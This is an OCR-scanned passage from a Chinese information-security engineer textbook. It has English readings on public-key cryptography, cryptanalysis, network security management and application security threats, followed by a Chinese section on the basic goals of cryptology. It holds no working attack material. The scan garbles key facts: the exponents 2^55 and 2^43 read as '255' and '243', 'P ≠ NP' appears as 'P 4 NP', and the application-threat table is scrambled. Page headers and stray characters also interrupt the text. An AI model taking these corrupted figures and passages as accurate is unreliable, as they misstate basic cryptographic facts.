public key system is so constructed that calculation of one key (the ‘private key’) is 
computationally infeasible from the other (the ‘public key’), even though they are necessarily 
related. Instead, both keys are generated secretly, as an interrelated pair") The historian David 
Kahn described public-key cryptography as "the most revolutionary new concept in the field 
since polyalphabetic substitution emerged in the Renaissance" "7! 

In public-key cryptosystems, the public key may be freely distributed, while its paired 
private key must remain secret. The public key is typically used for encryption, while the 
private or secret key is used for decryption. Diffie and Hellman showed that public-key 
cryptography was possible by presenting the Diffie-Hellman key exchange protocol. 

In 1978, Ronald Rivest, Adi Shamir, and Len Adleman invented RSA, another public-key 
system." 

In 1997, it finally became publicly known that asymmetric key cryptography had been 
invented by James H. Ellis at GCHQ, a British intelligence organization, and that, in the early 
1970s, both the Diffie-Hellman and RSA algorithms had been previously developed (by 
Malcolm J. Williamson and Clifford Cocks, respectively). 

The Diffie-Hellman and RSA algorithms, in addition to being the first publicly known 
examples of high quality public-key algorithms, have been among the most widely used. 
Others include the Cramer-Shoup cryptosystem, ElGamal encryption, and various elliptic 
curve techniques. See Category:Asymmetric-key cryptosystems. 

Padlock icon from the Firefox Web browser, meant to indicate a page has been sent in 
SSL or TLS-encrypted protected form. However, such an icon is not a guarantee of security; 
any subverted browser might mislead a user by displaying such an icon when a transmission is 
not actually being protected by SSL or TLS. 

In addition to encryption, public-key cryptography can be used to implement digital 
signature schemes. A digital signature is reminiscent of an ordinary signature; they both have 


第 1 章 信息 安全 基础 


the characteristic that they are easy for a user to produce, but difficult for anyone else to forge. 
Digital signatures can also be permanently tied to the content of the message being signed; 
they cannot then be ‘moved’ from one document to another, for any attempt will be detectable. 
In digital signature schemes, there are two algorithms: one for signing, in which a secret key is 
used to process the message (or a hash of the message, or both), and one for verification, in 
which the matching public key is used with the message to check the validity of the signature. 
RSA and DSA are two of the most popular digital signature schemes. Digital signatures are 
central to the operation of public key infrastructures and many network security schemes (eg, 
SSL/TLS, many VPNs, etc). 

Public-key algorithms are most often based on the computational complexity of "hard" 
problems, often from number theory. For example, the hardness of RSA is related to the 
integer factorization problem, while Diffie-Hellman and DSA are related to the discrete 
logarithm problem. More recently, elliptic curve cryptography has developed in which security 
is based on number theoretic problems involving elliptic curves. Because of the difficulty of 
the underlying problems, most public-key algorithms involve operations such as modular 
multiplication and exponentiation, which are much more computationally expensive than the 
techniques used in most block ciphers, especially with typical key sizes. As a result, 
public-key cryptosystems are commonly hybrid cryptosystems, in which a fast high-quality 
symmetric-key encryption algorithm is used for the message itself, while the relevant 
symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, 
hybrid signature schemes are often used, in which a cryptographic hash function is computed, 
and only the resulting hash is digitally signed.) 

(5) Cryptanalysis 

The goal of cryptanalysis is to find some weakness or insecurity in a cryptographic 
scheme, thus permitting its subversion or evasion. 

It is a commonly held misconception that every encryption method can be broken. In 
connection with his WWII work at Bell Labs, Claude Shannon proved that the one-time pad 
cipher is unbreakable, provided the key material is truly random, never reused, kept secret 
from all possible attackers, and of equal or greater length than the Imessage.P9] Most ciphers, 
apart from the one-time pad, can be broken with enough computational effort by brute force 
attack, but the amount of effort needed may be exponentially dependent on the key size, as 
compared to the effort needed to use the cipher. In such cases, effective security could be 
achieved if it is proven that the effort required (i-e., "work factor", in Shannon’s terms) is 
beyond the ability of any adversary. This means it must be shown that no efficient method (as 


opposed to the time-consuming brute force method) can be found to break the cipher. Since no 
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such showing can be made currently, as of today, the one-time-pad remains the only 
theoretically unbreakable cipher. 

There are a wide variety of cryptanalytic attacks, and they can be classified in any of 
several ways. A common distinction tums on what an attacker knows and what capabilities are 
available. In a ciphertext-only attack, the cryptanalyst has access only to the ciphertext (good 
modern cryptosystems are usually effectively immune to ciphertext-only attacks). In a 
known-plaintext attack, the cryptanalyst has access to a ciphertext and its corresponding 
plaintext (or to many such pairs). In a chosen-plaintext attack, the cryptanalyst may choose a 
plaintext and learn its corresponding ciphertext (perhaps many times); an example is gardening, 
used by the British during WWII. Finally, in a chosen-ciphertext attack, the cryptanalyst may 
be able to choose ciphertexts and learn their corresponding plaintexts.”! Also important, often 
overwhelmingly so, are mistakes (generally in the design or use of one of the protocols 
involved; see Cryptanalysis of the Enigma for some historical examples of this). 

Cryptanalysis of symmetric-key ciphers typically involves looking for attacks against the 
block ciphers or stream ciphers that are more efficient than any attack that could be against a 
perfect cipher. For example, a simple brute force attack against DES requires one known 
plaintext and 255 decryptions, trying approximately half of the possible keys, to reach a point 
at which chances are better than even the key sought will have been found. But this may not be 
enough assurance; a linear cryptanalysis attack against DES requires 243 known plaintexts and 
approximately 243 DES operations.P" This is a considerable improvement on brute force 
attacks. 

Public-key algorithms are based on the computational difficulty of various problems. The 
most famous of these is integer factorization (e.g., the RSA algorithm is based on a problem 
related to integer factoring), but the discrete logarithm problem is also important. Much 
public-key cryptanalysis concerns numerical algorithms for solving these computational 
problems, or some of them, efficiently (ie, in a practical time). For instance, the best known 
algorithms for solving the elliptic curve-based version of discrete logarithm are much more 
time-consuming than the best known algorithms for factoring, at least for problems of more or 
less equivalent size. Thus, other things being equal, to achieve an equivalent strength of attack 
resistance, factoring-based encryption techniques must use larger keys than elliptic curve 
techniques. For this reason, public-key cryptosystems based on elliptic curves have become 
popular since their invention in the mid-1990s. 

While pure cryptanalysis uses weaknesses in the algorithms themselves, other attacks on 
cryptosystems are based on actual use of the algorithms in real devices, and are called 


side-channel attacks. If a cryptanalyst has access to, say, the amount of time the device took to 
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encrypt a number of plaintexts or report an error in a password or PIN character, he may be 
able to use a timing attack to break a cipher that is otherwise resistant to analysis. An attacker 
might also study the pattern and length of messages to derive valuable information; this is 
known as traffic analysis, P”! and can be quite useful to an alert adversary. Poor administration 
of a cryptosystem, such as permitting too short keys, will make any system vulnerable, 
regardless of other virtues. And, of course, social engineering, and other attacks against the 
personnel who work with cryptosystems or the messages they handle (e.g., bribery, extortion, 
blackmail, espionage, torture, ...) may be the most productive attacks of all. 

(6) Cryptographic primitives 

Much of the theoretical work in cryptography concerns cryptographic primitives — 
algorithms with basic cryptographic properties — and their relationship to other cryptographic 
problems. More complicated cryptographic tools are then built from these basic primitives. 
Complex functionality in an application must be built in using combinations of these 
algorithms and assorted protocols. Such combinations are called cryptosystems and it is they 
which users actually encounter. Examples include PGP and its variants, ssh, SSL/TLS, all 
PKIs, digital signatures, etc For example, a one-way function is a function intended to be easy 
to compute but hard to invert. 

But note that, in a very general sense, for any cryptographic application to be secure (if 
based on computational feasibility assumptions), one-way functions must exist. However, if 
one-way functions exist, this implies that P 4 NP"! since the P versus NP problem is currently 
unsolved, it is not known if one-way functions really do exist. For instance, if one-way 
functions exist, then secure pseudorandom generators and secure pseudorandom functions 
exist”?! 

Other cryptographic primitives include the encryption algorithms themselves, one-way 
permutations, trapdoor permutations, etc. 

(7) Cryptographic protocols 

In many cases, cryptographic techniques involve back and forth communication among 
two or more parties in space (e.g., between the home office and a branch office) or across time 
(e.g., cryptographically protected backup data). The term cryptographic protocol captures this 
general idea. 

Cryptographic protocols have been developed for a wide range of problems, including 


RA [25][26] 


relatively simple ones like interactive proof systems, secret sharing, and 


zero-knowledge proofs,” and much more complex ones like electronic cashPsl and secure 
multiparty computation P9] 


When the security of a good cryptographic system fails, it is rare that the vulnerability 
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leading to the breach will have been in a quality cryptographic primitive. Instead, weaknesses 
are often mistakes in the protocol design (often due to inadequate design procedures, or less 
than thoroughly informed designers), in the implementation (e.g., a software bug), in a failure 
of the assumptions on which the design was based (e.g., proper training of those who will be 
using the system), or some other human error. 

Many cryptographic protocols have been designed and analyzed using ad hoc methods, 
but they rarely have any proof of security, leaving aside the effects of humans in their 
operations. Methods for formally analyzing the security of protocols, based on techniques 
from mathematical logic (see for example BAN logic), and more recently from concrete 
security principles, have been the subject of research for the past few decades.BOBHEB21 
Unfortunately, to date these tools have been cumbersome and are not widely used for complex 
designs. 

The study of how best to implement and integrate cryptography in applications is itself a 
distinct field, see: cryptographic engineering and security engineering. 

2. Key Words 

[1] plaintext: In cryptography, plaintext is the information which the sender wishes to 
transmit to the receiver(s). 

[2] encryption: In cryptography, encryption is the process of transforming information 
(referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone 
except those possessing special knowledge, usually referred to as a key. The result of the 
process is encrypted information (in cryptography, referred to as ciphertext). 

[3]cipher: In cryptography, a cipher (or cypher) is an algorithm for performing 
encryption and decryption — a series of well-defined steps that can be followed as a 
procedure. 

[4] key: In cryptography, a key is a piece of information (a parameter) that determines the 
functional output of a cryptographic algorithm. Without a key, the algorithm would have no 
result. 

[5] digital signature: A digital signature or digital signature scheme is a type of 
asymmetric cryptography used to simulate the security properties of a handwritten signature 
on paper. Digital signature schemes consist of at least three algorithms: a key generation 
algorithm, a signature algorithm, and a verification algorithm. 

[6] message authentication code (MAC):A cryptographic message authentication code 
(MAC) is a short piece of information used to authenticate a message. A MAC algorithm 
accepts as input a secret key and an arbitrary-length message to be authenticated, and outputs a 


MAC (sometimes known as a tag). 
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(7) brute force attack: In cryptanalysis, a brute force attack is a method of defeating a 
cryptographic scheme by trying a large number of possibilities; for example, possible keys in 
order to decrypt a message. 

(8) quantum computer: A quantum computer is a device for computation that makes 
direct use of distinctively quantum mechanical phenomena, such as superposition and 
entanglement, to perform operations on data. In a classical (or conventional) computer, 
information is stored as bits; in a quantum computer, it is stored as qubits (quantum binary 
digits). The basic principle of quantum computation is that the quantum properties can be used 
to represent and structure data, and that quantum mechanisms can be devised and built to 
perform operations with this data. 

3. References 

[1] Liddell and Scott’s Greek-English Lexicon. Oxford University Press. 1984. 

[2] David Kahn. The Codebreakers, 1967, ISBN 0-684-83130-9. 

[3] a b c Oded Goldreich. Foundations of Cryptography. Volume 1: Basic Tools. 
Cambridge University Press, 2001, ISBN 0-521-79172-3. 

4] Cryptology (definition). Merriam-Webster’s Collegiate Dictionary (llth edition). 
Merriam-Webster, Retrieved on 2008-02-01. 

5] Kama Sutra. Sir Richard F. Burton, translator. Part I, Chapter III, 44th and 45th arts. 

6] Hakim, Joy (1995). A History of Us: War, Peace and all that Jazz. New York: Oxford 
University Press. ISBN 0-19-509514-6. 

7] James Gannon. Stealing Secrets, Telling Lies: How Spies and Codebreakers Helped 
Shape the Twentieth Century, Washington, D.C., Brassey’s, 2001, ISBN 1-57488-367-4. 

8] a b c Whitfield Diffie and Martin Hellman. New Directions in Cryptography. IEEE 
Transactions on Information Theory. vol. IT-22, Nov. 1976, pp: 644-654. 

9] a b c d e f AJ Menezes. PC van Oorschot, SA Vanstone. Handbook of Applied 
Cryptography, ISBN 0-8493-8523-7. 

10] FIPS PUB 197: The official Advanced Encryption Standard. 

11] NCUA letter to credit unions, July 2004. 

[12] RFC 2440 - Open PGP Message Format. 

[13] SSH at windowsecurity.com by Pawel Golen, July 2004. 

[14] a b Bruce Schneier. Applied Cryptography, 2nd edition, Wiley, 1996, ISBN 
0-471-11709-9. 

[15] Whitfield Diffie and Martin Hellman, “Multi-user cryptographic techniques” Diffie 
and Hellman. AFIPS Proceedings 45, pp109-112, June 8, 1976. 

[16] Ralph Merkle was working on similar ideas at the time and encountered publication 


i <s 国 


Doh 


信息 安全 工程 师 教程 


delays, and Hellman has suggested that the term used should be Diffie-Hellman-Merkle 
aysmmetric key cryptography. 

[17] David Kahn. “Cryptology Goes Public”, 58 Foreign Affairs 141, 151 (fall 1979), p. 
153, 

[18] R. Rivest, A. Shamir, L. Adleman. A Method for Obtaining Digital Signatures and 
Public-Key Cryptosystems. Communications of the ACM, Vol. 21 (2), pp.120-126. 1978. 
Previously released as an MIT “Technical Memo” in April 1977, and published in Martin 
Gardner’s Scientific American Mathematical Recreations column. 

19] Clifford Cocks. A Note on Non-Secret Encryption. CESG Research Report, 20 
November 1973. 

20] Shannon: Claude Shannon and Warren Weaver. The Mathematical Theory of 
Communication. University of Illinois Press, 1963, ISBN 0-252-72548-4 

21] Pascal Junod. “On the Complexity of Matsui’s Attack”. SAC 2001. 

22] Dawn Song, David Wagner, and Xuqing Tian, Timing Analysis of Keystrokes and 
Timing Attacks on SSH. In Tenth USENIX Security Symposium, 2001. 

23] J. Hastad, R. Impagliazzo, L.A. Levin, and M. Luby. A Pseudorandom Generator 
From Any One-Way Function. SIAM J. Computing, vol. 28 num. 4, pp 1364-1396, 1999. 

24] Laszl6 Babai. Trading group theory for randomness. Proceedings of the Seventeenth 
Annual Symposium on the Theory of Computing, ACM, 1985. 

25] G Blakley. Safeguarding cryptographic keys. In Proceedings of AFIPS 1979, 
volume 48, pp. 313-317, June 1979. 

26] A. Shamir. How to share a secret. In Communications of the ACM, volume 22, pp. 
612-613, ACM, 1979. 

27] S. Goldwasser, S. Micali, and C. Rackoff. The Knowledge Complexity of Interactive 
Proof Systems. SIAM J. Computing, vol. 18, num. 1, pp. 186-208, 1989. 

[28] S. Brands. Untraceable Off-line Cash in Wallets with Observers. In Advances in 
Cryptology — Proceedings of CRYPTO, Springer-Verlag, 1994. 

29] R. Canetti. Universally composable security: a new paradigm for cryptographic 
protocols. In Proceedings of the 42nd annual Symposium on the Foundations of Computer 
Science (FOCS), pp. 136-154, IEEE, 2001. 

30] D. Dolev and A. Yao. On the security of public key protocols. IEEE transactions on 
information theory, vol. 29 num. 2, pp. 198-208, IEEE, 1983. 

31] M. Abadi and P. Rogaway. Reconciling two views of cryptography (the 


computational soundness of formal encryption). In IFIP International Conference on 
Theoretical Computer Science (IFIP TCS 2000), Springer-Verlag, 2000. 


第 1 章 信息 安全 基础 


[32] D. Song. Athena, an automatic checker for security protocol analysis. In Proceedings 
of the 12th IEEE Computer Security Foundations Workshop (CSFW), IEEE, 1999. 


1.5.2 Network Security 


1. Reading Materials 

Network security consists of the provisions made in an underlying computer network 
infrastructure, policies adopted by the network administrator to protect the network and the 
network-accessible resources from unauthorized access and the effectiveness (or lack) of these 
measures combined together. 

(1) Comparison with computer security 

Securing network infrastructure is like securing possible entry points of attacks on a 
country by deploying appropriate defense. Computer security is more like providing means to 
protect a single PC against outside intrusion. The former is better and practical to protect the 
civilians from getting exposed to the attacks. The preventive measures attempt to secure the 
access to individual computers--the network itself—thereby protecting the computers and 
other shared resources such as printers, network-attached storage connected by the network. 
Attacks could be stopped at their entry points before they spread. As opposed to this, in 
computer security the measures taken are focused on securing individual computer hosts. A 
computer host whose security is compromised is likely to infect other hosts connected to a 
potentially unsecured network. A computer host’s security is vulnerable to users with higher 
access privileges to those hosts. 

(2) Attributes of a secure network 

Network security starts from authenticating any user, most likely a username and a 
password. Once authenticated, a stateful firewall enforces access policies such as what 
services are allowed to be accessed by the network users .中 Though effective to prevent 
unauthorized access, this component fails to check potentially harmful contents such as 
computer worms being transmitted over the network. An intrusion prevention system aps)?! 
helps detect and prevent such malware. IPS also monitors for suspicious network traffic for 
contents, volume and anomalies to protect the network from attacks such as denial of service. 
Communication between two hosts using the network could be encrypted to maintain privacy. 
Individual events occurring on the network could be tracked for audit purposes and for a later 
high level analysis. 

Honeypots, essentially decoy network-accessible resources, could be deployed in a 
network as surveillance and early-wamning tools. Techniques used by the attackers that attempt 


to compromise these decoy resources are studied during and after an attack to keep an eye on 
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new exploitation techniques. Such analysis could be used to further tighten security of the 
actual network being protected by the honeypot"! 

(3) Security management 

Security Management for networks is different for all kinds of situations. A small home 

or an office would only require basic security while large businesses will require high 
maintenance and advanced software and hardware to prevent malicious attacks from hacking 
and spamming. 

Small homes 

e Abasic firewall. 

e For Windows users, basic Antivirus software like McAfee, Norton AntiVirus, AVG 
Antivirus or Windows Defender, others may suffice if they contain a virus scanner to 
scan for malicious software. 

e When using a wireless connection, use a robust password. 

Medium businesses 

e A fairly strong firewall 

e A strong Antivirus software and Internet Security Software. 

e For authentication, use strong passwords and change it on a bi-weekly/monthly basis. 

e When using a wireless connection, use a robust password. 

e Raise awareness about physical security to employees. 

e Use an optional network analyzer or network monitor. 

Large businesses 

e A strong firewall and proxy to keep unwanted people out. 

e A strong Antivirus software and Internet Security Software. 

e For authentication, use strong passwords and change it on a weekly/bi-weekly basis. 

e When using a wireless connection, use a robust password. 

è Exercise physical security precautions to employees. 

e Prepare a network analyzer or network monitor and use it when needed. 

e Implement physical security management like closed circuit television for entry areas 
and restricted zones. 

e Security fencing to mark the company’s perimeter. 

e Fire extinguishers for fire-sensitive areas like server rooms and security rooms. 

e Security guards can help to maximize security. 

School 

e An adjustable firewall and proxy to allow authorized users access from the outside and 


inside. 
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e A strong Antivirus software and Internet Security Software. 

e Wireless connections that lead to firewalls. 

e CIPA compliance. 

® Supervision of network to guarantee updates and changes based on popular site usage. 

e Constant supervision by teachers, librarians, and administrators to guarantee protection 

against attacks by both internet and sneakernet sources. 

Large Government 

e A strong strong firewall and proxy to keep unwanted people out. 

e A strong Antivirus software and Internet Security Software. 

e Strong encryption, usually with a 256 bit key. 

e Whitelist authorized wireless connection, block all else. 

e All network hardware is in secure zones. 

e All host should be on a private network that is invisible from the outside. 

e Put all servers in a DMZ, or a firewall from the outside and from the inside. 

è Security fencing to mark perimeter and set wireless range to this. 

2. Key Words 

authorization: is the concept of allowing access to resources only to those permitted to 
use them. More formally, authorization is a process (often part of the operating system) that 
protects computer resources by only allowing those resources to be used by resource 
consumers that have been granted authority to use them. Resources include individual files’ or 
items’ data, computer programs, computer devices and functionality provided by computer 
applications. 

Network-attached storage (NAS): is file-level computer data storage connected to a 
computer network providing data access to heterogeneous network clients. 

Authentication: is the act of establishing or confirming something (or someone) as 
authentic, that is, that claims made by or about the thing are true. This might involve 
confirming the identity of a person, the origins of an artifact, or assuring that a computer 
program is a trusted one. 

A computer worm: is a self-replicating computer program. It uses a network to send 
copies of itself to other nodes (computer terminals on the network) and it may do so without 
any user intervention. Unlike a virus, it does not need to attach itself to an existing program. 
Worms almost always cause harm to the network, if only by consuming bandwidth, whereas 
viruses almost always corrupt or modify files on a targeted computer. 

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS 


attack): is an attempt to make a computer resource unavailable to its intended users. Although 
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the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists 
of the concerted, malevolent efforts of a person or persons to prevent an Internet site or service 
from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks 
typically target sites or services hosted on high-profile web servers such as banks, credit card 
payment gateways, and even DNS root servers. 
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1.5.3 Application Security 


1. Reading Materials 

Application security encompasses measures taken to prevent exceptions in the security 
policy of an application or the underlying system (vulnerabilities) through flaws in the design, 
development, or deployment of the application. 

Applications only control the use of resources granted to them, and not which resources 
are granted to them. They, in turn, determine the use of these resources by users of the 
application through application security. 

(1) Methodology 

According to the patterns & practices Improving Web Application Security book, a 
principle-based approach for application security includes: m 

¢ Know your threats 

¢ Secure the network, host and application 

e Bake security into your application life cycle 

Note that this approach is technology / platform independent. It is focused on principles, 
patterns, and practices. 

For more information on a principle-based approach to application security, see patterns 
& practices Application Security Methodology. 

(2) Threats, Attacks, Vulnerabilities, and Countermeasures 

According to the patterns & practices Improving Web Application Security book, the 


following terms are relevant to application security: 
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Asset. A resource of value such as the data in a database or on the file system, or a 
system resource. 

Threat. A negative effect. 

Vulnerability. A weakness that makes a threat possible. 

Attack (or exploit). An action taken to harm an asset. 


Countermeasure. A safeguard that addresses a threat and mitigates risk. 


(3) Application Threats / Attacks 
According to the patterns & practices Improving Web Application Security book, the 


following are classes of common application security threats / attacks: 


0] 


Category Threats/Attacks 
Input Validation Buffer overflow; cross-site scripting; SQL injection; canonicalization 
oes Network eavesdropping; brute force attacks; dictionary attacks; cookie replay; 
Authentication z penp y ig 
credential theft 
os Se Elevation of privilege; disclosure of confidential data; data tampering; lurin; 
Authorization i B 7 5 
attacks 
í Unauthorized access to administration interfaces; unauthorized access to 
Configuration 2 5 < ae 
ib configuration stores; retrieval of clear text configuration data; lack of individual 
8 accountability; over-privileged process and service accounts 
Sensitive data Access sensitive data in storage; network eavesdropping: data tampering 
Session management Session hijacking; session replay; man in the middle 
Cryptography Poor key generation or key management: weak or custom encryption 


Parameter manipulation 


Query string manipulation; form field manipulation; cookie manipulation; HTTP 
header manipulation 


Exception management | Information disclosure; denial of service 


Auditing and logging 


User denies performing an operation; attacker exploits an application without 
trace; attacker covers his or her tracks 


(4) Mobile Application Security 


The proportion of mobile devices providing open platform functionality is expected to 


continue to increase as time move on. The openness of these platforms offers significant 


opportunities to all parts of the mobile eco-system by delivering the ability for flexible 


programmes and service delivery options that may be installed, removed or refreshed multiple 


times in line with the user’s needs and requirements. However, with openness comes 


responsibility and unrestricted access to mobile resources and APIs by applications of 


unknown or untrusted origin could result in damage to the user, the device, the network or all 


8 


aD 


信息 安全 工程 师 教程 


of these, if not managed by suitable security architectures and network precautions. Mobile 
Application Security is provided in some form on most open OS mobile devices (Symbian 
os?! Microsoft [citation needed], BREW, etc.). Industry groups have also created 
recommendations including the GSM Association and Open Mobile Terminal Platform 
(OMTP) 名 

(5) Security testing for applications 

Security testing techniques scour for vulnerabilities or security holes in applications. 
These vulnerabilities leave applications open to exploitation. Ideally, security testing is 
implemented throughout the entire software development life cycle (SDLC) so that 
vulnerabilities may be addressed in a timely and thorough manner. Unfortunately, testing is 
often conducted as an afterthought at the end of the development cycle. 

Vulnerability scanners, and more specifically web application scanners, otherwise known 
as penetration testing tools (i.e. ethical hacking tools) have been historically used by security 
organizations within corporations and security consultants to automate the security testing of 
http request/responses; however, this is not a substitute for the need for actual source code 
review. Physical code reviews of an application’s source code can be accomplished manually 
or in an automated fashion. Given the common size of individual programs (often 500K Lines 
of Code or more), the human brain can not execute a comprehensive data flow analysis needed 
in order to completely check all circuitous paths of an application program to find 
vulnerability points. The human brain is suited more for filtering, interrupting and reporting 
the outputs of automated source code analysis tools available commercially versus trying to 
trace every possible path through a compiled code base to find the root cause level 
vulnerabilities. 

The two types of automated tools associated with application vulnerability detection 
(application vulnerability scanners) are Penetration Testing Tools (otherwise known as Black 
Box Testing Tools) and Source Code Analysis Tools (otherwise known as White Box Testing 
Tools). Tools in the Black Box Testing arena include Devfense, Watchfire, HP gi (through the 
acquisition of SPI Dynamics B), Cenzic, Nikto (open source), Grendel-Scan (open source), 
N-Stalker and Sandcat (freeware). Tools in the White Box Testing arena include Armorize 
Technologies, Fortify Software and Ounce Labs. 

Banking and large E-Commerce corporations have been the very early adopter customer 
profile for these types of tools. It is commonly held within these firms that both Black Box 
testing and White Box testing tools are needed in the pursuit of application security. Typically 
sited, Black Box testing (meaning Penetration Testing tools) are ethical hacking tools used to 
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attack the application surface to expose vulnerabilities suspended within the source code 
hierarchy. Penetration testing tools are executed on the already deployed application. White 
Box testing (meaning Source Code Analysis tools) are used by either the application security 
groups or application development groups. Typically introduced into a company through the 
application security organization, the White Box tools complement the Black Box testing tools 
in that they give specific visibility into the specific root vulnerabilities within the source code 
in advance of the source code being deployed. Vulnerabilities identified with White Box 
testing and Black Box testing are typically in accordance with the OWASP taxonomy for 
software coding errors. White Box testing vendors have recently introduced dynamic versions 
of their source code analysis methods; which operates on deployed applications. Given that the 
White Box testing tools have dynamic versions similar to the Black Box testing tools, both 
tools can be correlated in the same software error detection paradigm ensuring full application 
protection to the client company. 

2. Key Words 

(1) Vulnerability: is the susceptibility to physical or emotional injury or attack. It also 
means to have one’s guard down, open to censure or criticism; assailable. Vulnerability refers 
to a person’s state of being liable to succumb, as to persuasion or temptation. 

(2) A countermeasure: is a system (usually for a military application) designed to 
prevent sensor-based weapons from acquiring and/or destroying a target. 

Countermeasures that alter the electromagnetic, acoustic or other signature(s) of a target 
thereby altering the tracking and sensing behavior of an incoming threat (e.g., guided missile) 
are designated softkill measures. 

(3) Configuration management (CM) is a field of management that focuses on 
establishing and maintaining consistency of a product’s performance and its functional and 
physical attributes with its requirements, design, and operational information throughout its 
life. For information assurance, CM can be defined as the management of security features and 
assurances through control of changes made to hardware, software, firmware, documentation, 
test, test fixtures, and test documentation throughout the life cycle of an information system.s 

(4) session management: is the process of keeping track of a user’s activity across 
sessions of interaction with the computer system. 

(5) The Open Mobile Terminal Platform (OMTP): is a forum created by mobile 
network operators to discuss standards with manufacturers of cell phones and other mobile 
devices. Although dominated by network operators, the OMTP includes manufacturers such as 


Nokia, Samsung, Motorola, Sony Ericsson and LG Electronics. 
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2.1 密码 学 的 基本 概念 


密码 学 〈Cryptology) 是 一 门 古老 的 科学 。 大 概 自 人 类 社会 出 现 战 争 便 产 生 了 密码 ， 
以 后 逐渐 形成 一 门 独立 的 学 科 。 在 密码 学 形成 和 发 展 的 历程 中 ， 科 学 技术 的 发 展 和 战争 
的 刺激 都 起 了 积极 的 推动 作用 。 电 子 计算 机 一 出 现 便 被 用 于 密码 破译 ， 使 密码 进入 电子 
时 代 。1949 年 香农 (C.D.Shannon) 发 表 了 《保密 系统 的 通信 理论 》 的 著名 论文 ， 把 密 
码 学 置 于 坚实 的 数学 基础 之 上 ,标志 着 密码 学 作为 一 门 科 学 的 形成 。1976 年 W.Diffie 和 
M.Hellman 提出 公开 密 钥 密码 ， 从 此 开创 了 一 个 密码 新 时 代 。1977 年 美国 联邦 政府 颁布 
数据 加 密 标 准 (DES)， 这 是 密码 史上 的 一 个 创举 。1994 年 美国 联邦 政府 颁布 密 钥 托管 
加 密 标准 CEES), 1994 年 美国 联邦 政府 颁布 数字 签名 标准 (DSS)，2001 年 美国 联邦 政 
府 颁 布 高 级 加 密 标 准 (AES)。 我 国 国家 密码 管理 局 一 直 高 度 重 视 密 码 标准 管理 工作 ， 从 
2000 年 就 开始 组 织 相关 规范 的 组 织 编写 工作 ， 先 后 用 白皮书 的 形式 发 布 了 系列 技术 标 
准 ， 规 范 了 商用 密码 产品 的 研发 与 应 用 。2011 年 ， 经 国标 委 批 准 设立 了 密码 行业 标准 化 
技术 委员 会 ， 标 志 着 密码 标准 化 工作 正式 纳入 到 国家 标准 管理 体系 。 目 前 ， 我 国 许可 并 
大 力 推广 应 用 的 通用 密码 算法 是 SM2 椭圆 曲线 公 钥 密码 算法 .SM3 密码 杂凑 算法 和 SM4 
分 组 密码 算法 。 同时， 在 智能 电网 、 居 民 健 康 卡 、 社 会 保障 等 领域 允许 使 用 SM1 分 组 密 
码 算法 ， 在 电子 标签 、 重 要 门禁 系统 等 领域 采用 SM7 分 组 密码 算法 ， 在 通信 和 领域 采用 
ZUC 祖冲之 密码 算法 。 这 些 都 是 密码 发 展 史上 的 一 个 个 重要 的 里 程 碑 。 

研究 密码 编制 的 科学 称 为 密码 编制 学 (Cryptography), 研究 密码 破译 的 科学 称 为 密码 
分 析 学 (Cryptanalysis)， 密 码 编制 学 和 密码 分 析 学 共同 组 成 密码 学 (Cryptology)。 

密码 学 作为 信息 安全 的 关键 技术 ， 其 安全 目标 主要 包括 三 个 非常 重要 的 方面 : 保密 
性 (confidentiality)、 完 整 性 (integrity) 和 可 用 性 (availability )。 


2.1.1 密码 学 的 基本 安全 目标 


2.1.1.1 保密 性 

保密 性 是 确保 信息 仅 被 合法 用 户 访问 ， 而 不 被 泄露 给 非 授 权 的 用 户 、 实 体 或 过 程 ， 
或 供 其 利用 的 特性 。 即 防止 信息 泄漏 给 非 授权 个 人 或 实体 ， 信 息 只 为 授权 用 户 使 用 的 特 
性 。 这 里 的 “访问 ”是 指 不 仅 可 以 读 ， 还 能 浏览 、 打 印 或 简单 了 解 一 些 特殊 资源 是 否 
存在 。 
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常用 的 保密 技术 包括 : 防 侦 收 (使 对 手 侦 收 不 到 有 用 的 信息 )、 防 辐射 (防止 有 用 
信息 以 各 种 途径 辐射 出 去 )、 数 据 加 密 (在 密 钥 的 控制 下 , 用 加 密 算 法 对 信息 进行 加 密 处 
理 ,即使 对 手 得 到 了 加 密 后 的 信息 也 会 因为 没有 密 钥 而 无 法 读 懂 有 效 信息 )、 物 理 保密 ( 利 
用 各 种 物理 方法 ， 如 限制 、 隔 离 、 掩 蔽 、 控 制 等 措施 ， 保 护 信息 不 被 泄露 〉 等 。 
2.1.1.2 ”完整 性 

完整 性 是 指 所 有 资源 只 能 由 授权 方 或 以 授权 的 方式 进行 修改 ， 即 信息 未 经 授权 不 能 
进行 改变 的 特性 。 信 息 在 存储 或 传输 过 程 中 保持 不 被 偶然 或 蓄意 地 删除 、 修 改 、 伪 造 、 
乱 序 、 重 放 、 插 入 等 破坏 和 丢失 的 特性 。 完 整 性 是 一 种 面向 信息 的 安全 性 ， 它 要 求 保 持 
信息 的 原样 ， 即 信息 的 正确 生成 和 正确 存储 和 传输 。 

完整 性 与 保密 性 不 同 ， 保 密 性 要 求 信息 不 被 泄露 给 未 授权 的 人 ， 而 完整 性 则 要 求 信 
息 不 致 受到 各 种 原因 的 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 : 设备 故障 、 误 码 〈 传 
输 、 处 理 和 存储 过 程 中 产生 的 误 码 ， 定 时 的 稳定 度 和 精度 降低 造成 的 误 码 ， 各 种 干扰 源 
造成 的 误 码 )、 人 为 攻击 、 计 算 机 病毒 等 。 
2.1.1.3 ”可 用 性 

可 用 性 是 指 所 有 资源 在 适当 的 时 候 可 以 由 授权 方 访问 ， 即 信息 可 被 授权 实体 访问 并 
按 需 求 使 用 的 特性 。 信 息 服务 在 需要 时 ， 人 允许 授权 用 户 或 实体 使 用 的 特性 ， 或 者 是 网 络 
部 分 受 损 或 需要 降级 使 用 时 ， 仍 能 为 授权 用 户 提供 有 效 服务 的 特性 。 可 用 性 是 信息 系统 
面向 用 户 的 安全 性 能 。 信 息 系统 最 基本 的 功能 是 向 用 户 提供 服务 ， 而 用 户 的 需求 是 随机 
的 、 多 方面 的 、 有 时 还 有 时 间 要 求 。 可 用 性 一 般 用 系统 正常 使 用 时 间 和 整个 工作 时 间 之 
比 来 度量 。 

可 用 性 还 应 该 满足 以 下 要 求 : 身份 识别 与 确认 、 访问 控制 (对 用 户 的 权限 进行 控制 ， 
